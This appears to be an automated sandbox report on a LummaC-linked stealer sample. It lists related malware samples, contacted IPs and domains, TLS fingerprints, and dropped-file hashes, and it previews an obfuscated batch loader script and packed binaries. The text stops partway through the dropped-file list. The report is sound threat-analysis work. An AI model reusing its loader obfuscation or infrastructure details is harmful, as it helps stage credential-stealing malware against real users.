Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: CondosGold_nopump.exe

Simulations

Behavior and APIs

Time	Type	Description
05:41:04	API Interceptor	1x Sleep call for process: CondosGold_nopump.exe modified
07:31:41	API Interceptor	11x Sleep call for process: Cassette.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Installer.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	BnJxmraqlk.exe	Get hash	malicious	LummaC, PrivateLoader	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer	Browse	104.21.96.1
	NjFiIQNSid.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
steamcommunity.com	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	expt64.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	Invoice.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	NvOxePa.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	https://we.tl/t-fnebgmrnYQ	Get hash	malicious	Unknown	Browse	104.26.0.90
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	Undelivered Messages.htm	Get hash	malicious	Unknown	Browse	104.21.84.200
	driver.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
AKAMAI-ASUS	filename.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	expt64.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254
	armv5l.elf	Get hash	malicious	Unknown	Browse	23.209.153.127
	http://postman.com/	Get hash	malicious	Unknown	Browse	104.102.43.106
	https://sanctionssearch.ofac.treas.gov	Get hash	malicious	Unknown	Browse	23.49.251.37

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	expt64.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	1.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	SensorExpo.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	anti-malware-setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1 104.102.49.254
	cache_registerer.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1 104.102.49.254
	CY SEC AUDIT PLAN 2025.docx.doc	Get hash	malicious	Unknown	Browse	104.21.48.1 104.102.49.254
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.48.1 104.102.49.254
	Invoice.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\352348\Cassette.com	SensorExpo.exe	Get hash	malicious	LummaC	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\Drives.cmd (copy)

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (813), with CRLF line terminators
Category:	dropped
Size (bytes):	15758
Entropy (8bit):	5.120140452449369
Encrypted:	false
SSDEEP:	384:48eOi6ptcfIICBzR67qjiYkvO6R48/ZF0rrE:48eOltcBCBQ7Mi1Oq3ZarrE
MD5:	F09B25054B1B0532B076879548EC89C8
SHA1:	59094E8C99412EC6A2435CBCBBE8059446355032
SHA-256:	0D23DC5BD965715543363D5374D18011F15D9E06DBBAB6ECB62A3938DD12EE4D
SHA-512:	16DD8B6F48DF2C48A0E989CF481AE9DEFF0ECF49EF899CDBE9C4CEE53BFEE48D45C85D2EC1D57B1C3B5BE34AF9C5476402135B2DEB07739BA47AD8E984FB65BD
Malicious:	false
Preview:	Set Website=R..gALSells-..zeFriend-Finishing-Specifics-Moving-..yFZones-Indirect-Salary-Dreams-Carl-Divine-Kijiji-Hotel-..mpThorough-Participants-Trackback-Gather-Mike-..wAWBMesh-Rage-Century-Indirect-..TYKSecured-Cassette-Womens-Download-Minds-Burton-Chair-..kEMoves-Connected-Movement-Limited-Raw-..Set Diet=V..mzHCProtocol-Comic-..cdQjSql-..AGTUSupported-Police-Life-Seminars-..xnEmergency-Beyond-..onEqMint-Comments-Contractor-Electronics-Excluding-Comply-Charlie-Shock-..XohPCube-Effects-Puzzle-Copyrighted-..PSFires-Readings-Denver-Winning-Intranet-Experts-Ordering-Pi-..mRXXPop-Neon-Border-Post-..Set Situations= ..mISpirit-Kill-Sent-Nose-Mixture-Relatively-Fc-..klLovers-Equations-Zones-Sofa-Dates-Replacement-..SlChemistry-Summaries-Hdtv-Vg-Costs-Lecture-Pd-..JJDuDecisions-Bulk-Saving-Failed-Printer-Colin-Humidity-..BrBChef-Optional-Define-Asp-Bbs-..GbYJGonna-People-Form-Dealt-Prefix-Honey-..BtcRiders-Protocols-Independently-Hence-Meetup-Preserve-..yGPTAspnet-Taxi-Headed-Presented-..NXI

C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SensorExpo.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: [UPD]Intel_Unit.2.1.exe, Detection: malicious, Browse Filename: 'Set-up.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: RailProvides_nopump.exe, Detection: malicious, Browse Filename: c2.hta, Detection: malicious, Browse Filename: installer_1.05_36.8.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\352348\E

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	475927
Entropy (8bit):	7.999621373183763
Encrypted:	true
SSDEEP:	12288:XGsCTt9SKb4dC1x1hJU5YLaG43Vk9B3Tn0ZwR:XhCTt9xMdmhJUCLa3VynuG
MD5:	AC79C3191FBB88552A7DBD4D875DF09E
SHA1:	5F6C3BC0ECD09F79C4E9FEE81CFEFE6E85FF2516
SHA-256:	FB335ECAC71DC089DA72D7FA000547FDBF62E2FC0F37EDE8F052F85ED747AE09
SHA-512:	1507600B66E99FE7ED16F2508085DE7C7FDC1D92B3C76B9FEE0C48BD8A4AC264B8DE9BF7DCE88AD56933A104E8D6351B00DAFD933530AD34831033EDD267BFF7
Malicious:	false
Preview:	....]d.=....k.o..B.#.V.v..d..u...Eq...Z;........F...._}....b4h>...y....i...2bY......@...B.P......."._@.9..uK~....v).....kGp.."..x`p.6...SA.i..z...I....D....Yi.x..u_a..~....stD.%.b...+.B..k...~`..[+.Z..b.h:...4r_...4kXar..JT..G...P~.@.....c6w..wF&........Flm.j..!.jg.q....\|4+lX^.....\|IhA.tVl......J._.."p~{.j......v.Z!...;?.b.c.....K..v.......I..6.j).....T...O.[......]S....M.-.{'..,......+O..+.......;...Z!..3./..ok.\|QPG...\.~................?..K+0.......D.v.^...z."`...ox...g.43f......4{c..?x...DG).m..0.[...Bo.5..jm\|.._..0..Z.#S...G..{...x......L..;....0O.N..8e]...l...`~)?gHz\.9?9.....C.j#....H(%z4..%..qB...ZiV..=A....[...]13.:.Z.....C[...z.&@.cK.8(...U..)....n...@.Z%....".\|......+......G....E'uTx..:xyNjt.k.LB.,l..F.E~..h.;.Ep.sU...c.6.0..m..P..pS..3r.V.../......./.p!....gul.g.7....".KpS.....#.....1....J...g.....E.4.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T.

C:\Users\user\AppData\Local\Temp\Assessment

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	111616
Entropy (8bit):	5.745595346242765
Encrypted:	false
SSDEEP:	1536:oj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:ojfTq8QLeAg0Fuz08XvBNbjaAtsPR
MD5:	10305A41A60BE9B67325C94A31F8EDAF
SHA1:	C8C38AC6B1D2042D3041119F054A94EC1F377124
SHA-256:	81F31EC76DFCEA3139EFB84A07E0FAA5B1CBB68C799C33DC9C87575A1AABCB2D
SHA-512:	1547A465A11DF6FEF6512F7D0D33325BEB1B1DC35242F72A5E1C43BBC78C474569E7FEDCBD02926E3D030C161300D2644A9F34D47B27A00A0257D82EE0B6DC1F
Malicious:	false
Preview:	t(.M..A.....t..A..]....8.................F._^[..U..E.V3..@....2...F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C\|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S\|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[\|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.

C:\Users\user\AppData\Local\Temp\Audit

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997095057003264
Encrypted:	true
SSDEEP:	1536:y4d0p2s49gaMw7K73pbpbzX6f/+UzlPd/bb:y4dRs49gdwq3PUph
MD5:	8D75FC9991189A412D3E1FA1DFD75163
SHA1:	EE3D42335C7B504800B095D8F31BD97E1E0EFDBF
SHA-256:	3C1E37AB0C3F14AF16961DFDE9CBC76742B1400026758DFFE4AFEC1E32E17CAF
SHA-512:	8C12B8FB35D090FFC3F1AB845777AEF0FC711CFC802DA47580841D019E6532CD3B53B88F7C5F0CEF87EA6FE208678ABE1C1B1E7526C06B006F1E2D5BDCE21CB3
Malicious:	false
Preview:	..loO.....I&..U.U.b..+N..@.J>>$e...[..8.I1.zD...0;..h.B&...4.Y....t.G~Q!jl.U7).<.......2.......c..i?".'P.l.hA~5~..#-.K......K..!.....p..0ol.}.f..{#..}...d...=J?..G.UG...1@t.!@....A.3.R..8...qp%.\|G..^..#..Q..yOp....I.q.@...V_ee.poPL....<....{...S.fM..AR.6V...s.l6[..+QX6U..:k..Q.....jPw.+._.,[.P....L...S.T/.(..J..K .T..._0...%..r....cq.VzZBZ.JzR....$...%`..b&.9..".&...g5........x.,.G#Y........c......'7jS`..~p.g...O=..\.....X....7....[V...oO'G1G....u.\.b..U.d...mh2.....k..k.~.*.....S]...j..Q9.tI.E..(.......P.4jX..5.V{....Z.2.yU..o...t}td.W@.....`...0.5..T.EV..."..3\|.......aU.I..pwx.3/...R?.Yu..!w.o.@.Y==...I}.f..SRshkaER..k..E...h,....$c...gB.R?..[hkn....:..&/.l\|..N.#.l.?....[#.....(.=8..l.w:.EW.V...9t1~....@.jc!...y:...>.u.SyA3H.[.7....@...)@.,..M...}....-1..k..?...M.I.\|.x....yS..>b....4.Ki..>.Z..yI.....N.n.).1DO.#..f.N#z....h.....m...w.}.G.6..d........@g.S.<........-..qH..._Y.>.!...>).....}b./D..vl .]$....}O.....@.....'N.TnN..6. e.e

C:\Users\user\AppData\Local\Temp\Casio

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	42901
Entropy (8bit):	7.101865091239342
Encrypted:	false
SSDEEP:	768:jGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:jGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	8CB45AEEA40A56DA7EC6AC468C6A20F2
SHA1:	94C462D5C9F1081C26529B23AF82C493BEF6052E
SHA-256:	F07F84B2F7417A14E3E36A0E0B31A18EACD8AF1B38AEF4DFC7183010995B81B0
SHA-512:	3B160360FFC3080EA0B37D84A30C8BDDC546B062771D31776788BDE03AB62D9686402D7938CFED5FD695C26C583453E960ED326D2782188210AC601EEDD55175
Malicious:	false
Preview:	...................................................................................................................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................\.......V....[..%........\..k............Wz......e.......kM........:....[.........P..\.......0..........................................?...?...........................................(.....................L.........._.....A.u.t.o.I.t. .I.n.p.u.t. .B.o.x.........M.S. .S.h.e.l.l. .D.l.g..............P......,.........P.r.o.m.p.t................P..8............................P..I.2...........O.K................PW.I.2...........C.a.n.c.e.l...............C.o.n.t.e.x.t.1.......S.c.r.i.p.t. .&.P.a.u.s.e.d.............E.&.x.i.t.....................U.n.a.b.l.e. .t.o. .p.a.r.s.e. .l.i.n.e.....U.n.a.b.l.e. .t.o. .o.p.e.n. .t.h.e. .s.c.r.i.p.t. .f.i.l.e.....S.t.r.i.n.g. .m.i.s.s.i.n.g. .c.l.o.s.i.n.g. .q.u.o.t.e...!.B.a.d.l.y. .f.o.r

C:\Users\user\AppData\Local\Temp\Copying

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	148480
Entropy (8bit):	6.638907377766191
Encrypted:	false
SSDEEP:	3072:wA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAE:VloUDtf0accB3gBmmLsiS+SAE
MD5:	479B7FAACC9BC81ACB0922A5EB05BE14
SHA1:	39FD7FE93204AE9ED2A97E0413BEF832B17A853F
SHA-256:	9629DF2ED5E6ED7A485724C006F31F4A50CB315F495C769FFEC3245787430CA5
SHA-512:	60C427BB99C0A5ECC8B33D7C9CD81932A4C849541414BB0BEF6DAA6A13366A8A8DFE83FA7D70011ECEBDDB9B310A85F1AB20A7C1464A67AC790E4D495ED3CA7C
Malicious:	false
Preview:	..X.L...J...d.L.?.G...h.L.......l.L.......p.L.......t.L.....f..x.L.....\|.L.p.J.....L...H.....L.........L.........L.........L.....f....L.......L...J.....L.}.H.....L.........L.........L.........L.....f....L.......L.\|.J.....L...H.....L.........L.........L.........L.....f....L.......L.P.J.....L...H.....L.........L.........L.........L.....f....L.......L.@.I.....L...A.....L....... .L.......$.L.......(.L.....f..,.L.....0.L...J...<.L...G...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...J...`.L.H.H...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L.<.I.....L...H.....L.........L.........L.........L.....f....L.......L.<.J.....L./.H.....L.........L.........L.........L.....f....L.......L.\|.I.....L.k.H.....L.........L.........L.........L.....f....L.......L.p.I.....L...H.....L.........L.........L.........L.....f....L.......L...J.....L...H.....L.........L....... .L.......$.L.....f..(.L.....,.L.l.J...8.L.5.H...<.L.......@.L.......D.L.......H.L.....f..L.L.....P.L...J...\.L.q.H...`.L.......d.

C:\Users\user\AppData\Local\Temp\Dating

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997784387491903
Encrypted:	true
SSDEEP:	1536:KClv57hMdLiVSneFca3m5B7zJjgUgBql/1yVbCr3QMcwDTe5lH:ZhAnY2T9gUmMdyVbCrQMPqJ
MD5:	260503C7CFDC29544356D517366EB586
SHA1:	B491D547F5299812C226C6BA41C24288569950A0
SHA-256:	B1E3AE6B8BB1470E30953021C06A5AA5B7BFBE6AF83FA3D45174F03B839C1EB0
SHA-512:	5F78810B768687FD7276D7A3AFAC38F2FF5C09F55359710AEB932CF59DFEEF0EF00C3B211A070E537E12596870E74BE65A346A681DAECC3895ACDE60329C22BC
Malicious:	false
Preview:	....}./`j.....JW~#A'...S.e{bj.,..a..?j~...v46X..t\&l...J...Q...S..4...fI.G?.\4?.`S....p......Jl.z..0..J..d./....-.J.UfW....+..p..P...Z....r...d..w7.s....[...P..9.......Eo@,.Kr.~0h`+.g...XT.E..........R.....cgE.i....c.n...X.....P...nz.3.{o1..4r..I]..z.....F...........KK#U..[...d.....h.]VO.4....#........IA.....Q.....-j....0W....F.....4\|..........I.5Q#W..T-....0...(.r...E'...f..,...C...=.....M..".M.......M.X.7O..\\|)QL.i._.k.c....\FY..[(2?5....o.v......{y../.u.,{..D..CR%19h0, eV.A.s......]..}....1O......:,.(X.N&7.F..J..O.....\|.EYZ.L.@..o..~.7.....&zD.Cp.g.....W.8..nT.......K.(....W.w.E0.PW...,.C...6.......].....bI.3...<....F..A..u...B...B.R6....L..w...8k...ZqK.ui'g...P.Qe....6...1k.....d.PK...?...?...a.....~U...G...5 ...7;...R..."M#..<..l(sm.....Z.......Z..&5.....n}i....d'.q7..8.E\.(>...g.......f.S..z.'..-.4..WY...i....y./....G.w..%..c...B.......gs1..T.u..7V..D.t.>.L:3s.2]Zu.0.........pVH(..r........x%]..o3Y.vAU.@....-.^...CUr..

C:\Users\user\AppData\Local\Temp\Drives

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	ASCII text, with very long lines (813), with CRLF line terminators
Category:	modified
Size (bytes):	15758
Entropy (8bit):	5.120140452449369
Encrypted:	false
SSDEEP:	384:48eOi6ptcfIICBzR67qjiYkvO6R48/ZF0rrE:48eOltcBCBQ7Mi1Oq3ZarrE
MD5:	F09B25054B1B0532B076879548EC89C8
SHA1:	59094E8C99412EC6A2435CBCBBE8059446355032
SHA-256:	0D23DC5BD965715543363D5374D18011F15D9E06DBBAB6ECB62A3938DD12EE4D
SHA-512:	16DD8B6F48DF2C48A0E989CF481AE9DEFF0ECF49EF899CDBE9C4CEE53BFEE48D45C85D2EC1D57B1C3B5BE34AF9C5476402135B2DEB07739BA47AD8E984FB65BD
Malicious:	false
Preview:	Set Website=R..gALSells-..zeFriend-Finishing-Specifics-Moving-..yFZones-Indirect-Salary-Dreams-Carl-Divine-Kijiji-Hotel-..mpThorough-Participants-Trackback-Gather-Mike-..wAWBMesh-Rage-Century-Indirect-..TYKSecured-Cassette-Womens-Download-Minds-Burton-Chair-..kEMoves-Connected-Movement-Limited-Raw-..Set Diet=V..mzHCProtocol-Comic-..cdQjSql-..AGTUSupported-Police-Life-Seminars-..xnEmergency-Beyond-..onEqMint-Comments-Contractor-Electronics-Excluding-Comply-Charlie-Shock-..XohPCube-Effects-Puzzle-Copyrighted-..PSFires-Readings-Denver-Winning-Intranet-Experts-Ordering-Pi-..mRXXPop-Neon-Border-Post-..Set Situations= ..mISpirit-Kill-Sent-Nose-Mixture-Relatively-Fc-..klLovers-Equations-Zones-Sofa-Dates-Replacement-..SlChemistry-Summaries-Hdtv-Vg-Costs-Lecture-Pd-..JJDuDecisions-Bulk-Saving-Failed-Printer-Colin-Humidity-..BrBChef-Optional-Define-Asp-Bbs-..GbYJGonna-People-Form-Dealt-Prefix-Honey-..BtcRiders-Protocols-Independently-Hence-Meetup-Preserve-..yGPTAspnet-Taxi-Headed-Presented-..NXI

C:\Users\user\AppData\Local\Temp\Ethical

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.633054649927551
Encrypted:	false
SSDEEP:	3072:NPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBI:NPj0nEo3tb2j6AUkB0CThp6vmVnK
MD5:	4886FA52250B2EA113CCD6BCC6994015
SHA1:	FC455B281AC2E1550B267F5245475445B4869ECE
SHA-256:	7DAB6C65ADFB8F1A05B50A480C1ED040A2F9CA77276C15D40B221BBB6E8FAD0B
SHA-512:	940A6D363F0BEADD72415C6B78296EF663D2BC2B69F6106155198A959BE39218A0EDFB3004B1CFBB28DD65D872F5E3969CC6C060CD1697EA84F2788032FB4C49
Malicious:	false
Preview:	.....3.A.E..P...3.A.E..P...@..3.A.E..P.......~ ........+....2....F".......;.r........t..m........ovD..p.......U.;..t..U..@...+...B.....z.....u.9M............e.......U.;..t..U..@...+..j.....".BF....8...;.r.}..............C.jw.<C....1L.^..C.-Q.u...R.u..U..u................G.._..U..M..<Gf97t.U.3.G.}........E...E...E...E.G.E./.E...E.9.E...E._.E.u.E...E.U.E.p.E...A.............................x.E...E...E...E.M.E.X.E...E...E.(.E..................j.Y............Q...j.Yf;.vQ.....!...f;E...6...........t(..%....=....u.........#.#...............O..O...........V....t9.G...F.......G...B..G...3.3.f9B.....U..O...+....O.........F..w....@.K..E..O ;.s.........E.......E....u.j.3.Xf;......M.......f;E.../...f;E.tN..m..V...jpXf;...J...u....J..V...V ...........i........E..$...E..G........M...3.f;]......E...........M..t(..%....=....u.........#.#...............W.......r5......s...t)..........L.............M.,K......K......E......G.;...x....O...Q.....E...E...E.............jHXf;...b...j;Xf;...

C:\Users\user\AppData\Local\Temp\Examinations

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	MMDF mailbox
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	6.681980001152323
Encrypted:	false
SSDEEP:	1536:f6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXn:gdTmRxlHS3NxrHSBRtn
MD5:	AA7580CF47C4FA4D135E86158E14819D
SHA1:	B97C10E1883F50B6D27E319C823588C68A70C04A
SHA-256:	220106FE5F865FE588A2D20BD3FD2A78E9FE421BFAEF9AF688B7BC2F6FB3C719
SHA-512:	7E39D27AE73FDFDDE959C19B05D3D57AD36047DE2D8B4409E2F59F5F30701C6D4AFD60FDC6F53FFFB092B4091ED1AA5DC900973915F4DBAC39ED656205398459
Malicious:	false
Preview:	......................D...D...D.).D.J.D.k.D..@..@..@.p.D.p.D...D.9.D...D.Q.D...D...D...D...D...D...D..D.d.D.E.D.E.D.p.D.p.D...D...D...D..D.l.D.Hj........Y.......G..F...u.j.X........3.G.j.Z.........Q.....Y...s......&....G...+..E....P..qPQ........)w...........Hj....s.............G..G....u..............3.G...............Q.i....O.....M....Q.7V.i.......E..E...y.....L.=....s&...CL..}...E.......E..m..}.E..m..6...=....s&...CL..}...E.......E..m..}.E..m.........CL..}...E.......E..m..}.E..m.......7;C...X....N....E.....................B.j....[...j........C..C......t...........j..E..G.....Pj.j..7.G.........I..E.G..E.G.....G.3..G...............B.j..................C..C....u..............P.C.......K...AQ.3V...........E..E..y.....L.=....s&...CL..}...E.......E..m..}..E..m....=....s&...CL..}...E.......E..m..}..E..m.......CL..}...E.......E..m..}..E..m..i.........m...j.j.j.....d...5...Hj........Y.0.G..G.@...u.j.X........P.G.......O...AQ.7V......x=.A..s....9.E..E...y.....L.=.

C:\Users\user\AppData\Local\Temp\Excuse

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	105472
Entropy (8bit):	6.6048996943010625
Encrypted:	false
SSDEEP:	3072:ppIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRCB:qphfhnvO5bLezWWt/Dd314V14ZgP0B
MD5:	84FC0F80D9CDF138F56F00284E961F02
SHA1:	CA2DBE9175A654EADE7AC4A0608B73751D47C090
SHA-256:	5B66E7B1A42B9FCC9488AAA2F3CD933B39BB3E737E7F8A1593A2DFBDDE24456B
SHA-512:	CAEAFB8F84747616DD271E8FDF31600E0FB7E49363B69F82269B4B65A422D47ADE8D9A40523CBF63247B73F39996D15235FE5C7FD4EFA119D03159823C00FBAE
Malicious:	false
Preview:	I......R..\|2...L2.t..I8.y..\|2...D2.t..@8.u......@........._..3..F.....^[]...U..........D$.SVWPh..........I......R..\|2...L2.t..I8.y..\|2...D2.t..@8.u......@......6..._..3..F.....^[..]...U...........#M.S.]..D$.V.D$......C..D$......D$.....W.0..{...m...F.j?.0..$<...P...3....f..$.....C..p.....l...F.h.....0..$8...P.V...3....f..$.....C..H..p...i.......$0......v..C..H..S.....$........$......D$.Pj.....I._^3.[..]...U..E.....@.SV..0..W.x..@l...v........PV.E..P.......u..u.........F.........U...j.j.j.....I..M....u..E[..j...j.W.a........uP..$.I....I..\|....T..t..R8.B..\|....D..t..@8.@..j.3.CSj.W............w....^..{...j..E.PV....I....u7..$.I....I..\|....T..t..R8.B..\|....D..t..@8V.@....(.I..j.3.CSj.W.................SSj.W.^........................E..^..]....C..0....j...v.j.j.j.W...........7W...C..p.....j...v.j.j.j.W...........W.._^3.[....U..E.SV.u..@.W.....x..t8...n....F.....3.....H..D9.8\9.t..@8.@......D9.8\9.......3.Sj.j.P.E..+........u........3.A.N........=...t*.......3..A.N....

C:\Users\user\AppData\Local\Temp\Fat

